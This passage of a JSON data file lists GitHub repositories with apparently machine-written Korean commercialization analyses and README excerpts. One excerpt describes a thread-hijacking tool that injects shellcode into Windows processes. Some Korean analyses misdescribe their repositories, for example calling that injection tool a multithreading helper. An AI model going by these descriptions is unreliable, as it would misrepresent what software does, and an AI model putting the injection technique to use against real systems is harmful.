starback.js 프로젝트 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자의 뒤로가기 버튼 동작을 자유롭게 제어할 수 있는 도구로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 복잡한 업무 관리 플랫폼에서 사용자가 작성 중인 데이터를 잃지 않도록 뒤로가기를 제한하는 기능\n**2. 내부 업무 ","readme_excerpt":"![Starbackjs](https://user-images.githubusercontent.com/45036724/144230732-9104dc0e-c4fe-4c5c-9990-6693f4c0400c.gif)\n![Starbackjs Demo Night](https://user-images.githubusercontent.com/45036724/144230828-076a39ae-cc2a-4096-803d-a9bbb49b1d58.gif)\n\nClick for [more examples](https://zuramai.github.io/starback.js/)\n\n# Starback.js\n\n\n<table>\n\t<tr>\n\t\t<th>Sponsored by</th>\n\t</tr>\n\t<tr>\n\t\t<td>\n\t\t<p align=\"center\">\n\t\t\t<a href=\"https://lokal.so/?ref=zuramai\">\n\t\t\t\t<img src=\"https://github.com/zuramai/zuramai/blob/master/sponsors/lokalso.png?raw=true\"  width=\"50%\">\n\t\t\t</a>\n\t\t</p>\t\n\t\t</td>\n\t</tr>\n</table>\n\n## Getting Started\nYou can use starback.js directly with `<script>` tag or import syntax.\n- With `<script>` tag\n\n  ```html\n  # Using CDN\n  <script src=\"https://unpkg.com/starback@2.1.1/dist/starback.global.js\"></script>\n\n  # Using downloaded files\n  <script src=\"PATH_TO_YOUR_DIST_FOLDER/starback.js\"></script>\n  ```\n\n- With import\n\n  Install via NPM first:\n\n  ```bash\n  npm install starback\n  ```\n\n  ","composite_score":0.4691,"license_safety_tag":"unknown"},{"name":"trimstray/nginx-admins-handbook","github_url":"https://github.com/trimstray/nginx-admins-handbook","stars":5,"language":"Shell","license":"MIT","abandonment_months":18,"description":"# Nginx 관리자 핸드북 (nginx-admins-handbook)\n\n## 왜 보물인가\n웹사이트 속도를 관리하는 핵심 기술인 Nginx를 쉽게 배울 수 있는 완전한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹사이트 호스팅 SaaS**: 고객들에게 자신의 웹사이트 속도를 최적화하는 방법을 가르치는 온라인 교육 플랫폼\n2. **기업 IT 관리","readme_excerpt":"<div align=\"center\">\n  <h1>Nginx Admin's Handbook</h1>\n</div>\n\n<div align=\"center\">\n  <b><code>My notes on NGINX administration basics, tips & tricks, caveats, and gotchas.</code></b>\n</div>\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://www.hostingadvice.com/how-to/nginx-vs-apache/\">\n    <img src=\"https://github.com/trimstray/nginx-admins-handbook/blob/master/static/img/nginx_meme.png\" alt=\"Meme\">\n  </a>\n</p>\n\n<br>\n\n<p align=\"center\">\n  <sup>\n    <i>\n      Hi-diddle-diddle, he played on his<br>\n      fiddle and danced with lady pigs.<br>\n      Number three said, \"Nicks on tricks!<br>\n      I'll build my house with <b>EN-jin-EKS</b>!\".<br>\n      <a href=\"https://g.co/kgs/HCcQVz\">The Three Little Pigs: Who's Afraid of the Big Bad Wolf?</a>\n    </i>\n  </sup>\n</p>\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://github.com/trimstray/nginx-admins-handbook/pulls\">\n    <img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true\" alt=\"Pull Requests\">\n  </a>\n  <a href=\"LICENSE.","composite_score":0.469,"license_safety_tag":"safe"},{"name":"Panshak/arcinvoice","github_url":"https://github.com/Panshak/arcinvoice","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":22,"description":"# Panshak/arcinvoice 상용화 분석\n\n## 왜 보물인가\n중소 사업가들이 복잡한 청구서 작성을 간단하게 자동화할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 프리랜서와 소규모 법인을 위한 월 구독형 청구서 자동생성 서비스\n2. **내부 업무 도구**: 회계팀이 사용하는 기업용 인보이싱 시스템으로 도입","readme_excerpt":"### [accountill.com](https://accountill.com/)\n# MERN Stack Invoicing Application\nBuilt with the MERN stack (MongoDB, Express, React and NodeJS).\n![Invoice](https://res.cloudinary.com/almpo/image/upload/v1637311386/invoice/invoice-app_tcz0dj.png)\n\n\n## Update\nI am pleased to inform you that the name of this repository has been changed from Arc Invoice to Accountill.\nThere are so many things coming! Stay tuned!!\n\n\nPanshak\n----\n\n  * [Introduction](#introduction)\n  * [Key Features](#key-features)\n  * [Technologies used](#technologies-used)\n      - [Client](#client)\n      - [Server](#server)\n      - [Database](#database)\n  * [Configuration and Setup](#configuration-and-setup)\n  * [Troubleshooting](#troubleshooting)\n  * [Author](#author)\n  * [License](#license)\n\n## Introduction\nThis is a side project I've been working on. A full stack invoicing application made using the MERN stack (MongoDB, Express, React & Nodejs), specially designed for freelancers and small businesses, but can be used for","composite_score":0.4688,"license_safety_tag":"safe"},{"name":"Exploitacious/Auto-M365-ATP","github_url":"https://github.com/Exploitacious/Auto-M365-ATP","stars":8,"language":"","license":"unknown","abandonment_months":23,"description":"# Auto-M365-ATP 저장소 분석\n\n## 왜 보물인가\n마이크로소프트의 기업용 보안 시스템을 자동으로 관리해주는 도구로, 회사의 사이버 보안 업무를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 IT관리자를 위한 월 구독형 보안 자동화 플랫폼\n2. **내부 업무 도구**: 대기업 IT팀의 반복적인 보안 점검","readme_excerpt":"### Migrated to Auto-M365-TenantMaster\n\nMigrated and consolidated to:\nhttps://github.com/Exploitacious/Auto-M365-TenantMaster\n","composite_score":0.4682,"license_safety_tag":"unknown"},{"name":"overflowin/ThreadBoat","github_url":"https://github.com/overflowin/ThreadBoat","stars":8,"language":"C++","license":"MIT","abandonment_months":22,"description":"# ThreadBoat 상용화 분석\n\n## 왜 보물인가\n여러 작업을 동시에 처리하는 복잡한 프로그램을 간단하게 만들어주는 도구로, 기술 기업들이 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 실시간 데이터 처리가 필요한 분석 플랫폼(예: 마케팅 대시보드)에서 고객 요청을 빠르게 처리\n2. **내부 업무 도","readme_excerpt":"# threadfire\nProgram uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application. I was 15 years old when I made this - please ignore the substandard code. \n\n## About \nI developed this small project to continue my experiences of different code injection methods and to allow RedTeam security professionals to utilize this method as a unique way to perform software penetration testing. With Thread hijacking, it allows the hijacker.exe program to susepend a thread within the target.exe program\nallowing us to write shellcode to that target thread, and later be executed (via; WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()).\n\n\n### Example GIF \n![alt text](https://1.bp.blogspot.com/-pQCXPk6NBB8/XZU5iLWXOFI/AAAAAAAAQf4/2YjvCImtlqAqyhPKL6_ea1GnXJYNiSIwACNcBGAsYHQ/s640/ThreadBoat_1.gif)\n\n## Usage\n```cpp\nint main()\n{\n\tSystem sys;\n\tInterceptor incp;\n\tException exp;\n\n\tsys.returnVersionState();\n\tif (sys.returnPrivilegeEscalationState())\n\t{\n\t\tstd::cout ","composite_score":0.4678,"license_safety_tag":"safe"},{"name":"mudongliang/LinuxFlaw","github_url":"https://github.com/mudongliang/LinuxFlaw","stars":14,"language":"C","license":"BSD-2-Clause","abandonment_months":23,"description":"# LinuxFlaw 저장소 분석\n\n## 왜 보물인가\n리눅스 운영체제의 보안 취약점들을 체계적으로 정리한 데이터베이스로, 기업의 서버 보안 관리와 위험 진단에 필수적인 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 기업 서버의 취약점을 자동으로 스캔하고 위험도를 분석해주는 온라인 서비스\n2. **내부 IT 관리 도구**: 회","readme_excerpt":"# LinuxFlaw\n\nThis repo records all the vulnerabilities of linux software I have reproduced in my local workspace.\n\nIf the vulnerability has both CVE-ID and EDB-ID, CVE-ID is preferred as its directory name. All the vulnerable source code packages are stored in [source-packages](https://github.com/mudongliang/source-packages)\n\n## Vmware Workstation Images\nImage Name|username|password\n----------|--------|--------\n[Ubuntu 8.10](https://psu.box.com/s/yzy7l5okh77xa7bwzilk90jwf1it0bs1) | exploit | exploit\n[Ubuntu 10.04LTS](https://psu.box.com/s/g7pvmwsvi0a4o85j0clthkn64iuplzzl) | exploit | exploit\n[CentOS 6.5](https://psu.box.com/s/afzod6ewo0sdsz86wpw5f3ynwv7mz6uv) | core | core\n[CentOS 5.5](https://psu.box.com/s/rvqv9yxeywvq5rhzp212u1q8799w263s) | core | core\n[Ubuntu 11.04](https://psu.box.com/s/l1xjsuue2lfibtwr9osr5d00ddnqy19y) | dzm77 | dzm77\n[Ubuntu 12.04](https://psu.box.com/s/m55ncbvgmmcaua57ofhf606zhpstu4ch) | ubuntu | ubuntu\n[Fedora](https://psu.box.com/s/rfxl4zw1tkv84jxc6el3fqyo8clf","composite_score":0.4676,"license_safety_tag":"safe"},{"name":"yandex-praktikum/backend_test_homework","github_url":"https://github.com/yandex-praktikum/backend_test_homework","stars":60,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.4671,"license_safety_tag":"unknown"},{"name":"buqiyuan/vite-vue3-lowcode","github_url":"https://github.com/buqiyuan/vite-vue3-lowcode","stars":14,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"# vite-vue3-lowcode 분석 보고서\n\n## 왜 보물인가\n코딩 없이 마우스 클릭만으로 업무용 프로그램을 만들 수 있는 플랫폼으로, 개발자 부족과 높은 개발 비용으로 어려움을 겪는 중소기업들의 솔루션이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 HR, 재무, 재고 관리 등 간단한 업무 자동화 시스템을 직원들이 ","readme_excerpt":"# 基于 Vite2.x + Vue3.x + TypeScript H5 低代码平台\n\n[![license](https://img.shields.io/github/license/buqiyuan/vite-vue3-lowcode.svg)](LICENSE)\n\n**中文** | [English](./README.EN.md)\n\n### 目前还只是一个简单的模板，后面可能会引入较为完善的机制系统，感兴趣的小伙伴可以根据自己的需要去调整, 通过这个项目或许你可以接触到 vue3 很多有趣的新特性和玩法。\n\n` PS: 此项目为个人半年以前做的实验性小玩具，使用的都是最新的技术栈，后面由于个人时间问题，没有持续维护和完善，暂时计划于2022年下半年开始对项目进行整体的重构和重新设计，实现一个基本可用的简易低代码平台。感谢关注~`\n\n## 计划实现：\n\n- 操作历史快照\n- 支持生成 vue 模板组件\n- 生成组件大纲树\n- 提供常见的表单和列表模板\n- v-for 绑定数据源\n- 在 sandbox 中执行自定义逻辑\n- 基于 monaco-editor 自定义代码补全规则\n- 基于 vue3 createRenderer 自定义渲染器\n- 使用 Schema 描述数据结构（因为 schema 可以生成校验函数）\n- (⊙o⊙)…想到再做了~\n\n### 模型驱动的视图\n\n从最简单的结构来看，一个模型驱动的视图体系包含以下要素：\n\n- 模型\n\n  - 定义状态结构\n  - 定义动作\n\n- 视图\n  - 订阅状态\n  - 触发动作\n\n这是很简单的一种渲染模式，可以适用于大多数的场景。\n\n## 克隆项目\n\n```shell\ngit clone --single-branch https://github.com/buqiyuan/vite-vue3-lowcode.git\nor\ngit clone --depth=1 https://github.com/buqiyuan/vite-vue3-lowcode.git\n```\n\n```bash\ncd vite-vue3-lowcode\n\npnpm install\n\n```\n\n- run\n\n```bash\npnpm serve\n```\n\n- build\n\n```bash\npnpm build\n```\n\n## 技术栈","composite_score":0.467,"license_safety_tag":"safe"},{"name":"michalsnik/vue-content-placeholders","github_url":"https://github.com/michalsnik/vue-content-placeholders","stars":77,"language":"JavaScript","license":"MIT","abandonment_months":21,"description":"# vue-content-placeholders 분석\n\n## 왜 보물인가\n웹사이트가 로딩될 때 회색 박스 모양으로 콘텐츠가 준비 중임을 보여주는 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 뉴스/블로그 플랫폼 (SaaS)**\n- 기사가 로딩되는 동안 독자에게 \"콘텐츠가 곧 나타납니다\"는 시각적 신호를 제공하여 사용자 경험 향","readme_excerpt":"# vue-content-placeholders\n\n![npm](https://img.shields.io/npm/v/vue-content-placeholders.svg)\n[![vue2](https://img.shields.io/badge/vue-2.x-brightgreen.svg)](https://vuejs.org/)\n\n> Vue addon for rendering fake content while data is fetching to provide better UX and lower bounce rate.\n\n![example](https://i.imgur.com/JQlFjsS.gif)\n\n---\n\n## :cd: Installation\n\n* via npm: `npm install vue-content-placeholders --save`\n* via yarn: `yarn add vue-content-placeholders`\n\n## :rocket: Usage\n\nInclude plugin in your `main.js` file.\n\n```javascript\nimport Vue from 'vue'\nimport VueContentPlaceholders from 'vue-content-placeholders'\n\nVue.use(VueContentPlaceholders)\n```\n\n> ⚠️ A css file is included when importing the package. You may have to setup your bundler to embed the css in your page.\n\n### Examples:\n\n```html\n<content-placeholders>\n  <content-placeholders-heading :img=\"true\" />\n  <content-placeholders-text :lines=\"3\" />\n</content-placeholders>\n```\n\n![rendered example](https://i.imgur.com/LWfqxUe.png)\n","composite_score":0.4668,"license_safety_tag":"safe"},{"name":"zernonia/madewithsupabase","github_url":"https://github.com/zernonia/madewithsupabase","stars":5,"language":"Vue","license":"MIT","abandonment_months":23,"description":"# Made with Supabase 프로젝트 분석\n\n## 왜 보물인가\n웹/앱 개발자들이 Supabase(오픈소스 데이터베이스 서비스)로 만든 완성된 프로젝트들의 포트폴리오 모음이라, 비슷한 프로젝트를 빠르게 만들어야 하는 개발팀에게 실전 사례와 코드를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신생 스타트업이 Supabase 기","readme_excerpt":"<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/zernonia/madewithsupabase\">\n    <img src=\"assets/logo.svg\" alt=\"Logo\" width=\"80\" height=\"80\" />\n  </a>\n\n  <h2 align=\"center\"><strong>Made with Supabase ⚡</strong></h2>\n\n  <p align=\"center\">\n  A collection of projects made with <a href=\"https://supabase.io/\">Supabase</a>\n    <br />\n    Websites, Mobile Apps, SaaS, Plugins and more!\n    <br />\n    <br />\n    <a href=\"https://madewithsupabase.com/\">View Demo</a>\n    ·\n    <a href=\"https://github.com/zernonia/madewithsupabase/issues\">Report Bug</a>\n    ·\n    <a href=\"https://github.com/zernonia/madewithsupabase/issues\">Request Feature</a>\n  </p>\n</p>\n\n![Made with Supabase](public/og.png)\n\n# 🚀 Features\n\n- ✨ Curated list of projects\n- 🎉 Show the world your creation using Supabase\n- 🔎 Search by tags, for Supabase service\n- 💚 Hackathon submission (during event period)\n\n# 📇 About The Project\n\nAs the name suggest, this project is a collection of projects that made with","composite_score":0.4662,"license_safety_tag":"safe"},{"name":"antonioribeiro/version","github_url":"https://github.com/antonioribeiro/version","stars":33,"language":"PHP","license":"MIT","abandonment_months":21,"description":"# antonioribeiro/version 상용화 분석\n\n## 왜 보물인가\n소프트웨어 버전을 자동으로 관리하고 추적해주는 도구로, 개발팀이 반복적인 버전 관리 작업에서 해방되어 핵심 개발에 집중할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 버전 관리 플랫폼**\n- 스타트업과 중소 소프트웨어 회사가 자동 버전 관리 서비스를 월 구독으로","readme_excerpt":"# Version\n### Take control over your Laravel app version\n\n<p align=\"center\">\n    <img src=\"docs/screenshot.png\">\n</p>\n\n<p align=\"center\">\n    <a href=\"https://packagist.org/packages/pragmarx/version\"><img alt=\"Latest Stable Version\" src=\"https://img.shields.io/packagist/v/pragmarx/version.svg?style=flat-square\"></a>\n    <a href=\"/antonioribeiro/version/blob/master/LICENSE.md\"><img alt=\"License\" src=\"https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square\"></a>\n    <a href=\"https://scrutinizer-version.com/g/antonioribeiro/version/?branch=master\"><img alt=\"Code Quality\" src=\"https://img.shields.io/scrutinizer/g/antonioribeiro/version.svg?style=flat-square\"></a>\n    <a href=\"https://scrutinizer-version.com/g/antonioribeiro/version/?branch=master\"><img alt=\"Build\" src=\"https://img.shields.io/scrutinizer/build/g/antonioribeiro/version.svg?style=flat-square\"></a>\n</p>\n<p align=\"center\">\n    <a href=\"https://scrutinizer-version.com/g/antonioribeiro/version/?branch=master\"><","composite_score":0.466,"license_safety_tag":"safe"},{"name":"Microsoft/FASTER","github_url":"https://github.com/Microsoft/FASTER","stars":5,"language":"C#","license":"MIT","abandonment_months":13,"description":"# Microsoft/FASTER 분석 리포트\n\n## 왜 보물인가\n마이크로소프트가 만든 이 기술은 엄청 많은 데이터를 번개같이 빠르게 처리할 수 있는 핵심 엔진으로, 금융·검색·클라우드 같은 대규모 서비스의 심장 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **초고속 금융 거래 플랫폼**: 주식/암호화폐 거래소에서 밀리초 단위의 데이터 처리가 필요할 때","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/microsoft/FASTER/main/docs/assets/images/faster-logo.png\" alt=\"FASTER logo\" width=\"600px\" />\n</p>\n  \n[![NuGet](https://img.shields.io/nuget/v/Microsoft.FASTER.Core.svg)](https://www.nuget.org/packages/Microsoft.FASTER.Core/)\n[![Build Status](https://dev.azure.com/ms/FASTER/_apis/build/status/Microsoft.FASTER?branchName=main)](https://dev.azure.com/ms/FASTER/_build/latest?definitionId=8&branchName=main)\n[![Gitter](https://badges.gitter.im/Microsoft/FASTER.svg)](https://gitter.im/Microsoft/FASTER?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\n# Introduction\n\nManaging large application state easily, resiliently, and with high performance is one of the hardest\nproblems in the cloud today. The FASTER project offers two artifacts to help tackle this problem.\n\n* **FASTER Log** is a high-performance concurrent persistent recoverable log, iterator, and random \nreader library in C#. It supports very frequent commit opera","composite_score":0.4659,"license_safety_tag":"safe"},{"name":"vagabond-systems/jpmc-task-1","github_url":"https://github.com/vagabond-systems/jpmc-task-1","stars":43,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.4659,"license_safety_tag":"unknown"},{"name":"NELSONZHAO/zhihu","github_url":"https://github.com/NELSONZHAO/zhihu","stars":6,"language":"Jupyter Notebook","license":"unknown","abandonment_months":60,"description":"# NELSONZHAO/zhihu 저장소 분석\n\n## 왜 보물인가\n지식 공유 플랫폼인 지후(중국 Quora)의 데이터를 자동으로 수집하고 분석할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 시장 트렌드를 실시간 모니터링하는 구독형 분석 대시보드\n2. **내부 업무 도구**: 기업의 마케팅팀이 경쟁사 평판과 고객 반응을","readme_excerpt":"![](https://img.shields.io/badge/liscense-by%20NelsonZhao-brightgreen.svg)    ![](https://img.shields.io/badge/programming%20language-Python-orange.svg)\n\n\n## 简介\n\n该Repo内容为知乎专栏《机器不学习》的源代码。\n\n专栏地址：<https://zhuanlan.zhihu.com/zhaoyeyu>\n\n## 代码框架\n```TensorFlow```\n\n## 包含内容\n\n### 1.anna_lstm\n基于RNN（LSTM）对《安娜卡列尼娜》英文文本的学习，实现一个字符级别的生成器。 \n> 文章地址：[《安娜卡列尼娜》文本生成——利用TensorFlow构建LSTM模型\n](https://zhuanlan.zhihu.com/p/27087310)\n\n\n### 2.skip-gram\n实现skip-gram算法的Word2Vec，基于对英文语料的训练，模型学的各个单词的嵌入向量。\n> 文章地址：[基于TensorFlow实现Skip-Gram模型](https://zhuanlan.zhihu.com/p/27296712)\n\n\n### 3.generate_lyrics\n基于RNN实现歌词生成器。\n\n\n### 4.basic_seq2seq\n基于RNN Encoder-Decoder结构的Seq2Seq模型，实现对一个单词中字母的排序。\n> 文章地址：[从Encoder到Decoder实现Seq2Seq模型](https://zhuanlan.zhihu.com/p/27608348)\n\n\n### 5.denoise\\_auto\\_encoder\n基于MNIST手写数据集训练了一个自编码器，并在此基础上增加卷积层实现一个卷积自编码器，从而实现对图像的降噪。\n> 文章地址：[利用卷积自编码器对图片进行降噪](https://zhuanlan.zhihu.com/p/27902193)\n![](https://raw.githubusercontent.com/NELSONZHAO/zhihu/master/denoise_auto_encoder/dae_example.png)\n\n### 6.cifar_","composite_score":0.4658,"license_safety_tag":"unknown"},{"name":"seaswalker/Spring","github_url":"https://github.com/seaswalker/Spring","stars":8,"language":"Java","license":"unknown","abandonment_months":39,"description":"# seaswalker/Spring 저장소 분석\n\n## 왜 보물인가\nJava 기반의 웹 애플리케이션을 빠르고 쉽게 만들 수 있게 도와주는 프레임워크로, 전 세계 수천 개 회사에서 사용하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 협업 도구나 프로젝트 관리 플랫폼의 백엔드 시스템 구축\n2. **내부 업무 도구**: ","readme_excerpt":"# Spring\nSpring相关组件阅读笔记.\n\n# 传送门\n\n- [spring-core](https://github.com/seaswalker/Spring/blob/master/note/Spring.md)\n- [spring-aop](https://github.com/seaswalker/Spring/blob/master/note/spring-aop.md)\n- [spring-context](https://github.com/seaswalker/Spring/blob/master/note/spring-context.md)\n- [spring-task](https://github.com/seaswalker/Spring/blob/master/note/spring-task.md)\n- [spring-transaction](https://github.com/seaswalker/Spring/blob/master/note/spring-transaction.md)\n- [spring-mvc](https://github.com/seaswalker/Spring/blob/master/note/spring-mvc.md)\n- [guava-cache](https://github.com/seaswalker/Spring/blob/master/note/guava-cache.md)\n\n","composite_score":0.4656,"license_safety_tag":"unknown"},{"name":"imandolatkia/Android-Animated-Theme-Manager","github_url":"https://github.com/imandolatkia/Android-Animated-Theme-Manager","stars":23,"language":"Kotlin","license":"Apache-2.0","abandonment_months":23,"description":"# Android-Animated-Theme-Manager 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 테마와 색상을 부드럽게 전환하는 기술로, 사용자 경험을 크게 향상시키는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **테마 커스터마이징 SaaS**: 기업이 앱 내 다크모드/라이트모드 전환을 부드럽게 구현하도록 제공하는 클라우드 서비스\n2. *","readme_excerpt":"# Android Animated Theme Manager   [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Android%20Animated%20Theme%20Manager%20Library&url=https://github.com/imandolatkia/Android-Animated-Theme-Manager&hashtags=Android,Theme,Ripple,kotlin,java,lbrary)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)   [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.dolatkia/animated-theme-manager/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.dolatkia/animated-theme-manager)\n[![Generic badge](https://img.shields.io/badge/Repo_Size-26_kb-orange.svg)](https://search.maven.org/remotecontent?filepath=io/github/imandolatkia/animatedThemeManager/1.1.2/animatedThemeManager-1.1.2.aar)\n[![Generic badge](https://img.shields.io/badge/kotlin-100-blue.svg)](https://github.com/imandolatkia/Android-Animated-Theme-Manager/search?l=kotlin)\n[![Gener","composite_score":0.4654,"license_safety_tag":"safe"},{"name":"freeCodeCamp/guides","github_url":"https://github.com/freeCodeCamp/guides","stars":5,"language":"","license":"unknown","abandonment_months":82,"description":"# freeCodeCamp/guides 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 수천만 명의 사람들이 찾는 무료 학습 가이드 모음으로, 검증된 교육 콘텐츠의 가치를 입증하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로그래밍 학습 플랫폼에 가이드 콘텐츠를 통합하여 유료 구독 유도\n2. **내부 업무 도구**: 회사 직원 ","readme_excerpt":"![freeCodeCamp Social Banner](https://s3.amazonaws.com/freecodecamp/wide-social-banner.png)\n\n# The freeCodeCamp Guide\n\n**Notice:**\n\nThis repository has been archived in favor of the same available in the monorepo at <https://github.com/freeCodeCamp/freeCodeCamp>\n","composite_score":0.4649,"license_safety_tag":"unknown"},{"name":"Hvass-Labs/TensorFlow-Tutorials","github_url":"https://github.com/Hvass-Labs/TensorFlow-Tutorials","stars":11,"language":"Jupyter Notebook","license":"mit","abandonment_months":65,"description":"# TensorFlow-Tutorials 상용화 분석\n\n## 왜 보물인가\nGoogle에서 만든 인공지능 학습 도구의 체계적인 강의 자료로, 초보자도 최신 AI 기술을 단계별로 배울 수 있는 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유료 AI/머신러닝 강좌 콘텐츠로 활용하여 월간 구독 수익 창출\n2. **기업 내부 교육 ","readme_excerpt":"# TensorFlow Tutorials\n\n[Original repository on GitHub](https://github.com/Hvass-Labs/TensorFlow-Tutorials)\n\nOriginal author is [Magnus Erik Hvass Pedersen](http://www.hvass-labs.org)\n\n## Introduction\n\n* These tutorials are intended for beginners in Deep Learning and TensorFlow.\n* Each tutorial covers a single topic.\n* The source-code is well-documented.\n* There is a [YouTube video](https://www.youtube.com/playlist?list=PL9Hr9sNUjfsmEu1ZniY0XpHSzl5uihcXZ) for each tutorial.\n\n## Tutorials for TensorFlow 2\n\nThe following tutorials have been updated and work with **TensorFlow 2**\n(some of them run in \"v.1 compatibility mode\").\n\n1. Simple Linear Model\n([Notebook](https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/01_Simple_Linear_Model.ipynb))\n([Google Colab](https://colab.research.google.com/github/Hvass-Labs/TensorFlow-Tutorials/blob/master/01_Simple_Linear_Model.ipynb))\n\n2. Convolutional Neural Network\n([Notebook](https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/maste","composite_score":0.4649,"license_safety_tag":"safe"},{"name":"sqshq/sampler","github_url":"https://github.com/sqshq/sampler","stars":9,"language":"Go","license":"GPL-3.0","abandonment_months":27,"description":"","readme_excerpt":"# Sampler. Visualization for any shell command.\n[![Build Status](https://travis-ci.com/sqshq/sampler.svg?token=LdyRhxxjDFnAz1bJg8fq&branch=master)](https://travis-ci.com/sqshq/sampler) [![Go Report Card](https://goreportcard.com/badge/github.com/sqshq/sampler)](https://goreportcard.com/report/github.com/sqshq/sampler)\n\nSampler is a tool for shell commands execution, visualization and alerting. Configured with a simple YAML file.\n\n![sampler](https://user-images.githubusercontent.com/6069066/56404396-70b14d00-6234-11e9-93cd-54461bf40c96.gif)\n\n## Why do I need it?\nOne can sample any dynamic process right from the terminal — observe changes in the database, monitor MQ in-flight messages,  trigger a deployment script and get notification when it's done. \n\nIf there is a way to get a metric using a shell command, then it can be visualized with Sampler momentarily.\n\n## Installation\n\n### macOS\n\n[HomeBrew](https://brew.sh):\n```bash\nbrew install sampler\n```\n\n[MacPorts](https://www.macports.org):\n","composite_score":0.4643,"license_safety_tag":"restricted"},{"name":"Tencent/rapidjson","github_url":"https://github.com/Tencent/rapidjson","stars":7,"language":"C++","license":"NOASSERTION","abandonment_months":16,"description":"# Tencent/rapidjson 비즈니스 분석\n\n## 왜 보물인가\n데이터를 빠르고 효율적으로 처리하는 핵심 엔진으로, 금융·통신·클라우드 서비스 등 대규모 시스템의 성능을 좌우하는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 실시간 데이터 분석 플랫폼 - 사용자 행동 분석, 이벤트 로그 처리 등을 고속으로 처리하는 서비스","readme_excerpt":"![RapidJSON logo](doc/logo/rapidjson.png)\n\n![Release version](https://img.shields.io/badge/release-v1.1.0-blue.svg)\n\n## A fast JSON parser/generator for C++ with both SAX/DOM style API\n\nTencent is pleased to support the open source community by making RapidJSON available.\n\nCopyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip.\n\n* [RapidJSON GitHub](https://github.com/Tencent/rapidjson/)\n* RapidJSON Documentation\n  * [English](http://rapidjson.org/)\n  * [简体中文](http://rapidjson.org/zh-cn/)\n  * [GitBook](https://www.gitbook.com/book/miloyip/rapidjson/) with downloadable PDF/EPUB/MOBI, without API reference.\n\n## Build status\n\n| [Linux][lin-link] | [Windows][win-link] | [Coveralls][cov-link] |\n| :---------------: | :-----------------: | :-------------------: |\n| ![lin-badge]      | ![win-badge]        | ![cov-badge]          |\n\n[lin-badge]: https://travis-ci.org/Tencent/rapidjson.svg?branch=master \"Travis build status\"\n[lin-link]:  https://travis-ci.org/Tencent/rapidjson \"Trav","composite_score":0.4643,"license_safety_tag":"unknown"},{"name":"e2k-community/awesome-e2k","github_url":"https://github.com/e2k-community/awesome-e2k","stars":6,"language":"","license":"NOASSERTION","abandonment_months":23,"description":"# awesome-e2k 저장소 평가\n\n## 왜 보물인가\nE2K 커뮤니티의 자산과 리소스를 한 곳에 모아둔 가이드북으로, 관심 있는 사람들이 빠르게 배우고 시작할 수 있는 진입점을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: E2K 개발자 커뮤니티를 위한 온보딩 플랫폼으로 구축하여 신규 회원 유입 자동화\n- **내부 업무 도구**: ","readme_excerpt":"# Awesome E2K\n\nВ данном репозитории собраны материалы касающиеся процессоров на архитектуре Эльбрус-2000 (e2k).\n\n---\n\nВы можете предложить свою правку через [issue](https://github.com/e2k-community/awesome-e2k/issues) или [pull request](https://github.com/e2k-community/awesome-e2k/pulls).\n\n---\n- Книги, статьи и доклады на конференциях\n\t- [Книги](#книги)\n\t- [Статьи от сотрудников МЦСТ](#статьи-от-сотрудников-мцст)\n\t- [Статьи от энтузиастов и партнеров](#cтатьи-от-энтузиастов-и-партнеров)\n\t- [Доклады на конференциях, семинарах](#доклады-на-конференциях-семинарах)\n- Операционные системы, программы и игры\n\t- [Операционные системы](#операционные-системы)\n\t- [Программы](#программы)\n\t- [Патчи и портированные программы](#патчи)\n\t- [Библиотеки](#библиотеки)\n\t- [Инструменты разработки](#инструменты-разработки)\n\t- [Игры](#игры)\n- Форумы, чаты, wiki с постоянно 